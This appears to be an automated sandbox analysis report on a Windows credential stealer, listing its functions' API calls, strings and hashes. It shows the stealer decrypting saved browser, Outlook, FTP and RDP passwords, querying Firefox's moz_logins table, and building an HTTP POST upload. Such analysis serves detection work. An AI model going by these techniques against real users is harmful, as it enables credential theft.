                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$CryptDataFreeLocalUnprotect
                  • String ID: ftp://$http://$https://
                  • API String ID: 3968356742-2804853444
                  • Opcode ID: 35d07bf2ee0863f22bbc49e801769af40006044562cd22e94c9840ce37007f23
                  • Instruction ID: 98da3cbdc63e8ffab8f2d6ab5e355ebb60933bdd86054fc1250a36d790598718
                  • Opcode Fuzzy Hash: 35d07bf2ee0863f22bbc49e801769af40006044562cd22e94c9840ce37007f23
                  • Instruction Fuzzy Hash: EB51DA72810109FADF11AF91DD41EEE7B7AEF48318F14403AF611B11A1D7799A90DF98
                  Function 0041032D Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 140COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 123456
                  • API String ID: 0-158520161
                  • Opcode ID: 2c0b4a8982a1173f3c8a2c55f452ae6bdfa028bd1e6173cb2f604709961d564c
                  • Instruction ID: 4ff08b9673e267ace140181447cf4255118950924d58b97e5f676ee4c44255ff
                  • Opcode Fuzzy Hash: 2c0b4a8982a1173f3c8a2c55f452ae6bdfa028bd1e6173cb2f604709961d564c
                  • Instruction Fuzzy Hash: DA515F70904208EBEF119F91DD86BEDBBB5EB44304F148066E610A91E1C7F99AD4DB29
                  Function 0040A557 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 105stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040A2A9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2E2
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A58B
                  • lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A615
                  • lstrcmpiA.KERNEL32(?,WininetCacheCredentials), ref: 0040A634
                  • lstrcmpiA.KERNEL32(?,MS IE FTP Passwords), ref: 0040A653
                  • StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A66C
                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A6B2
                  • LocalFree.KERNEL32(?), ref: 0040A6DF
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcmpi$ByteCharMultiWide$CryptDataFreeLocalUnprotect
                  • String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
                  • API String ID: 3809606326-3076635702
                  • Opcode ID: e12b3fd39bf32ebbdaaabfaa667b547eaed294adb198a8ef7480dc3e779ae47c
                  • Instruction ID: d8573c41fe4d69a5315fcaad572809c63864cb87822d90682a8830d63048aee8
                  • Opcode Fuzzy Hash: e12b3fd39bf32ebbdaaabfaa667b547eaed294adb198a8ef7480dc3e779ae47c
                  • Instruction Fuzzy Hash: F041067190021DEADF219E50CC46FDA7AB9BF08304F14C0A6F644750D0DBB69AE59FD9
                  Function 00408961 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104filestringCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 004089D1
                  • lstrcmpiA.KERNEL32(00414F7E,?), ref: 004089FA
                  • lstrcmpiA.KERNEL32(00414F80,?), ref: 00408A17
                  • FindNextFileA.KERNEL32(?,?,?,?,00000000,?), ref: 00408ABE
                  • FindClose.KERNEL32(?,?,?,?,?,00000000,?), ref: 00408AD1
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                  • String ID: *.*$\*.*
                  • API String ID: 3040542784-1692270452
                  • Opcode ID: 266f601d4f122dd849f925886e07e10c82f98f2873f1fcdb3033ee4c45cf3a36
                  • Instruction ID: 1e30f031303a085b38748eb962b8890ccc3570ea6637a02dba116d6117304564
                  • Opcode Fuzzy Hash: 266f601d4f122dd849f925886e07e10c82f98f2873f1fcdb3033ee4c45cf3a36
                  • Instruction Fuzzy Hash: 5D316D70A00209AADF10BF61CD42AEE7769AF40304F1041BBF458B51F2DB789AD1AE59
                  Function 0040CE3D Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(00000000), ref: 0040CEE2
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040CF48
                  • LocalFree.KERNEL32(00000000), ref: 0040CF6F
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptDataFreeLocalUnprotectlstrlen
                  • String ID: full address:s:$password 51:b:$username:s:
                  • API String ID: 2920030623-2945746679
                  • Opcode ID: 75af0113992c4346936c86c28b325d0cc1530dd4f7a527af40f7d2e286d8de40
                  • Instruction ID: 18adffc5b52cd1553bccd2a74e548d689630eee789468983d86ff9c335b6abb1
                  • Opcode Fuzzy Hash: 75af0113992c4346936c86c28b325d0cc1530dd4f7a527af40f7d2e286d8de40
                  • Instruction Fuzzy Hash: 6241627290010AEADF11ABE5CD85BEEBF76EF44714F10423BE600711E0D7794A92DB5A
                  Function 0040A96D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040A9DF
                  • lstrlenW.KERNEL32(00416363,?,?,00000000), ref: 0040AA1D
                  • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040AA4D
                  • LocalFree.KERNEL32(00000000), ref: 0040AA7F
                  • CredFree.ADVAPI32(00000000), ref: 0040AA9D
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
                  • String ID: Microsoft_WinInet_*
                  • API String ID: 3891647360-439986189
                  • Opcode ID: 4d1ec1d05e07769bc6f95a99a4758796e5bee459a58f8c94a4a975656dae1d5f
                  • Instruction ID: ee26c8b2c9094d42fdf39799a89538bf129262060b97b76ef5a92aab507a7280
                  • Opcode Fuzzy Hash: 4d1ec1d05e07769bc6f95a99a4758796e5bee459a58f8c94a4a975656dae1d5f
                  • Instruction Fuzzy Hash: 0B311A75900209EAEF21CF84CD05BEEB7B4EB44305F15443AE951762D0D3BC9AA5CBAA
                  Function 0040AB24 Relevance: 4.6, APIs: 3, Instructions: 121stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(?), ref: 0040AB39
                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040ABF1
                  • LocalFree.KERNEL32(00000000), ref: 0040AC24
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptDataFreeLocalUnprotectlstrlen
                  • String ID:
                  • API String ID: 2920030623-0
                  • Opcode ID: ffd0805ddd691e6525886073a3b18e08ec2f0b6ea3480139b18f959a4aefd1c4
                  • Instruction ID: fcc9661cf6c9f3a93b8c2d67c769f64da82f2126ed0d19edb764173fa2cb65c8
                  • Opcode Fuzzy Hash: ffd0805ddd691e6525886073a3b18e08ec2f0b6ea3480139b18f959a4aefd1c4
                  • Instruction Fuzzy Hash: EA31C7776042099FEF209E58D844BCDB776EB85374F504133DA51A62C4D2BCAA92CB4E
                  Function 004044D2 Relevance: 4.6, APIs: 3, Instructions: 51memoryCOMMON
                  Download Yara Rule
                  APIs
                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404531
                  • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0040454D
                  • FreeSid.ADVAPI32(?), ref: 00404561
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateCheckFreeInitializeMembershipToken
                  • String ID:
                  • API String ID: 3429775523-0
                  • Opcode ID: 96ab053aa60c9289ee76a64f27c419c6e23215ea94b0a4f4e7851c2bc08df489
                  • Instruction ID: c9209d370c91890186ccc20bdf7f066e1e20f6c02a387ff0b76e85c5d3142024
                  • Opcode Fuzzy Hash: 96ab053aa60c9289ee76a64f27c419c6e23215ea94b0a4f4e7851c2bc08df489
                  • Instruction Fuzzy Hash: 11114470544249AEEB11CB98DC0EF9E7BF4AB50309F05C0A5D115AB2E1D3F99508C7AA
                  Function 004043DC Relevance: 3.1, APIs: 2, Instructions: 57encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404428
                  • LocalFree.KERNEL32(00000000), ref: 0040445C
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptDataFreeLocalUnprotect
                  • String ID:
                  • API String ID: 1561624719-0
                  • Opcode ID: b7e6baf17d649584fdb3284207b5bdafa7e77f212842a5f650daf4770349843c
                  • Instruction ID: 45124a1cf859253c60886c047de56744a914881e8d618bb026ac90a7441d8925
                  • Opcode Fuzzy Hash: b7e6baf17d649584fdb3284207b5bdafa7e77f212842a5f650daf4770349843c
                  • Instruction Fuzzy Hash: EF113A75A00218EFDF118F94DC84BDEBB74FB84365F408466FA21662D0C378AA40CF49
                  Function 004094D8 Relevance: 36.2, APIs: 16, Strings: 8, Instructions: 238COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
                  • API String ID: 0-1526611526
                  • Opcode ID: 8447a2f3be24acdddd1e7d144ae2769daa54ac47adb5ad1513ca8b17ddf358dc
                  • Instruction ID: 7fa1ede78399e99b9ebe2e72336c75a1aab04fbbc9805ac4238bf08c9b51bc50
                  • Opcode Fuzzy Hash: 8447a2f3be24acdddd1e7d144ae2769daa54ac47adb5ad1513ca8b17ddf358dc
                  • Instruction Fuzzy Hash: AD911571910209EADF11AFA1CC46BEEBEB5AF54308F20443BF411722E2DBBD4D919B59
                  Function 0040926B Relevance: 22.7, APIs: 8, Strings: 7, Instructions: 165COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins$ftp.$ftp://$http://$https://$mozsqlite3.dll$sqlite3.dll
                  • API String ID: 0-3560805513
                  • Opcode ID: d40c54777c441f4229944022fd1fe6a18eb256e2891277ed7e67e33702fd8e77
                  • Instruction ID: eb23a70922911dd94bec3e51da5842b199223d65ec57f699d029be6d08479b9e
                  • Opcode Fuzzy Hash: d40c54777c441f4229944022fd1fe6a18eb256e2891277ed7e67e33702fd8e77
                  • Instruction Fuzzy Hash: BD512970900109BADF11AFA1CD06AEE7F75AB58349F10843BB411B01E3D7BD8EA1AA5D
                  Function 0040AC3E Relevance: 21.2, APIs: 7, Strings: 7, Instructions: 178COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • wsprintfA.USER32 ref: 0040ACAA
                  • wsprintfA.USER32 ref: 0040ACBD
                  • wsprintfA.USER32 ref: 0040ACD0
                  • wsprintfA.USER32 ref: 0040ACE3
                  • wsprintfA.USER32 ref: 0040ACF6
                  • wsprintfA.USER32 ref: 0040AD09
                  • wsprintfA.USER32 ref: 0040AD1C
                    • Part of subcall function 0040AB24: lstrlen.KERNEL32(?), ref: 0040AB39
                    • Part of subcall function 0040AB24: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040ABF1
                    • Part of subcall function 0040AB24: LocalFree.KERNEL32(00000000), ref: 0040AC24
                    • Part of subcall function 004015CB: lstrlen.KERNEL32(00000000), ref: 004015D7
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: wsprintf$Locallstrlen$AllocCryptDataFreeUnprotect
                  • String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
                  • API String ID: 3846021373-1012938452
                  • Opcode ID: 2519a298067e9783dec0646fb6d7badb70df905e626c99b58e293020547ea991
                  • Instruction ID: 81a7154d9f2e3192bbe3b7d18b47f02929d6a0aca95bbcff7d33a99a4b22bd81
                  • Opcode Fuzzy Hash: 2519a298067e9783dec0646fb6d7badb70df905e626c99b58e293020547ea991
                  • Instruction Fuzzy Hash: 1F61C532840208BAEF027FA1DC42EEDBB72BF04345F14853AF914741B1D77A5AA4EB59
                  Function 0040F545 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 103stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040A2A9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A2E2
                    • Part of subcall function 0040A2F4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A330
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F58E
                  • lstrcmpiA.KERNEL32(?,identification), ref: 0040F60E
                  • lstrcmpiA.KERNEL32(?,identitymgr), ref: 0040F623
                  • lstrcmpiA.KERNEL32(?,inetcomm server passwords), ref: 0040F646
                  • lstrcmpiA.KERNEL32(?,outlook account manager passwords), ref: 0040F665
                  • lstrcmpiA.KERNEL32(?,identities), ref: 0040F684
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcmpi$ByteCharMultiWide
                  • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                  • API String ID: 2818632708-4287852900
                  • Opcode ID: 46954f5b077a3dfa9a17dc33f4d33fca0ec5392fd2194f51de6a880c558c7073
                  • Instruction ID: 32c20b9bd6a285d89c9aa568a9db40aa56d369e7289a9a407497ecae3c86032a
                  • Opcode Fuzzy Hash: 46954f5b077a3dfa9a17dc33f4d33fca0ec5392fd2194f51de6a880c558c7073
                  • Instruction Fuzzy Hash: 28416F7180021DABEF219F50CD41FDA7B79BF05304F0045B6B604751E1DB799AE99F98
                  Function 00402E2F Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 61registryCOMMON
                  Download Yara Rule
                  APIs
                  • StrStrIA.SHLWAPI(?,explorer.exe), ref: 00402D7B
                  • ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,explorer.exe), ref: 00402D9F
                  • OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402DC9
                  • OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 00402DE1
                  • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00402DEE
                  • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402E0F
                  • CloseHandle.KERNEL32(?), ref: 00402E34
                  • CloseHandle.KERNEL32(?,?), ref: 00402E3C
                  • CloseHandle.KERNEL32(?), ref: 00402E46
                  • Process32Next.KERNEL32(?,00000128), ref: 00402E58
                  • CloseHandle.KERNEL32(?), ref: 00402E68
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
                  • String ID: explorer.exe
                  • API String ID: 3144406365-3187896405
                  • Opcode ID: fc796b8a3d22a4ea1dc248bac3309cee6a96ccfa98b65722c03fef052a418923
                  • Instruction ID: e9f5f745be509d9dcf1df6bba715be1a6a0849aa2247a233fc918bc4ba82b5eb
                  • Opcode Fuzzy Hash: fc796b8a3d22a4ea1dc248bac3309cee6a96ccfa98b65722c03fef052a418923
                  • Instruction Fuzzy Hash: BE210031A50118AADF219B61DD49BEEB7B4AB08344F1044B6E209B11E0DBB89F85DF99
                  Function 0040BA3C Relevance: 15.1, APIs: 6, Strings: 4, Instructions: 63stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004028FE: lstrlen.KERNEL32(?), ref: 00402932
                  • StrStrIA.SHLWAPI(?,004164BB), ref: 0040BA50
                  • lstrcmpiA.KERNEL32(CONSTRAINT,?), ref: 0040BA72
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcmpilstrlen
                  • String ID: CONSTRAINT$origin_url$password_value$username_value
                  • API String ID: 3649823140-2401479949
                  • Opcode ID: 12214d783ff5d567bc1ec32ecb2231f9776f49af898319369f998b69f80e5026
                  • Instruction ID: 828ab2d763eb7cd0177f349250a9170fbaa97ab777379c78cb920ae62136411c
                  • Opcode Fuzzy Hash: 12214d783ff5d567bc1ec32ecb2231f9776f49af898319369f998b69f80e5026
                  • Instruction Fuzzy Hash: 89113D76300109BADF216A25EC029DE3F91EB51398B008136F855A41E2E7FDC9E1AA9C
                  Function 00403DE5 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 133networkstringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403E58
                  • InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403E83
                  • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403EC9
                  • wsprintfA.USER32 ref: 00403EEE
                  • lstrlen.KERNEL32(?,00001000,00001000,00001000), ref: 00403F19
                  • closesocket.WS2_32(?), ref: 00403F64
                  Strings
                  • <, xrefs: 00403EA3
                  • POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403EE6
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$Crack$AllocCreateLocalclosesocketlstrlenwsprintf
                  • String ID: <$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                  • API String ID: 4072649068-2005047030
                  • Opcode ID: 869221f094870a76bc170feb6c88f5b7edf58946339f30f57cd7e09e20171a11
                  • Instruction ID: 93fb31511f3c83f5c313d9664fe0d2adf6ddb800077f286839c43cfcfe5c6ff3
                  • Opcode Fuzzy Hash: 869221f094870a76bc170feb6c88f5b7edf58946339f30f57cd7e09e20171a11
                  • Instruction Fuzzy Hash: BF41F771D00209EAEF11AFE5CC41BEEBEB9EF08346F10403AF510B52A1D7B95A55DB19
                  Function 00409AC1 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 119COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: IsRelative$Path$Profile$profiles.ini
                  • API String ID: 0-4107377610
                  • Opcode ID: e39d3af07d84ec044e21e377f8e650803fea04e58434d95e65791fa9d5e176d3
                  • Instruction ID: 4dbcadc1619a9706d489fe659427113ee9d3f87f8c14865decc9af53c423ac16
                  • Opcode Fuzzy Hash: e39d3af07d84ec044e21e377f8e650803fea04e58434d95e65791fa9d5e176d3
                  • Instruction Fuzzy Hash: 15413D31A00146BADF227BA1DC02EAE7F72AF51354F14857BB510741F2DBBD9E90AB09
                  Function 0040446A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404478
                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404490
                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004044A1
                  • GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004044B0
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$CurrentHandleModuleProcess
                  • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                  • API String ID: 977827838-3073145729
                  • Opcode ID: e1b920541c9229e0638caa801859ebc3f112c8c4ad0cc267b262cb0da077447c
                  • Instruction ID: c3550a283bbffe0b95a980ca9f34ad72dcd434ffdf089d204d5dcc3367299639
                  • Opcode Fuzzy Hash: e1b920541c9229e0638caa801859ebc3f112c8c4ad0cc267b262cb0da077447c
                  • Instruction Fuzzy Hash: 8DF054B271020466C710B2B96C45BDF269887C03A9F290A77F105F22C1E9FCDD858278
                  Function 0040D854 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: <setting name="$value="
                  • API String ID: 0-3468128162
                  • Opcode ID: 91a259b221128b41385dd14aff69d6b40571917ad41be014f69d9e228e269f48
                  • Instruction ID: d8e6478b80cb4aa323a0f1ef7dcf88da86faea970d0efa92e7622961ce03b881
                  • Opcode Fuzzy Hash: 91a259b221128b41385dd14aff69d6b40571917ad41be014f69d9e228e269f48
                  • Instruction Fuzzy Hash: 78319272D0425A9ECF11BBE18C41AEEBFB19F15314F1440BBE440B2291D7B84E45D7AD
                  Function 00401FFD Relevance: 10.6, APIs: 7, Instructions: 56fileCOMMON
                  Download Yara Rule
                  APIs
                  • ExitProcess.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040201E
                  • GetFileSize.KERNEL32(00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040202B
                  • CreateFileMappingA.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040203F
                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00402054
                  • CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00402063
                  • CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040206A
                  • CloseHandle.KERNEL32(?,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00402079
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseFileHandle$CreateExitMappingProcessSizeView
                  • String ID:
                  • API String ID: 3150701006-0
                  • Opcode ID: daaf07374e8540c6cdb5df11b3425a20ea5e07ebc92b28c0fedbe5a698556156
                  • Instruction ID: d399f326a401a41e3911470efd7f2dd0ea8cd6c92bc63ed3790d9b1a64691747
                  • Opcode Fuzzy Hash: daaf07374e8540c6cdb5df11b3425a20ea5e07ebc92b28c0fedbe5a698556156
                  • Instruction Fuzzy Hash: DD114070680301B7EF312F71CC87F553A94AB41B58F20816677547D1D6DAF998A0861C
                  Function 004086D8 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 190COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ftp://$http://$https://
                  • API String ID: 0-2804853444
                  • Opcode ID: 74e2403431151642e0b42474d48d15e98af3cab691b3d043a5ca587e0513b932
                  • Instruction ID: e89b673faafa54c7238fd0be839d226a3d8478c5231bebd31a99dfac202c58f0
                  • Opcode Fuzzy Hash: 74e2403431151642e0b42474d48d15e98af3cab691b3d043a5ca587e0513b932
                  • Instruction Fuzzy Hash: 1F610872800109FEDF11AF91CD45AEEBBB9EF04348F10807BB841B51A1DB798B95DB98
                  Function 0040E0FE Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 101COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "/>$winex="
                  • API String ID: 0-1498080979
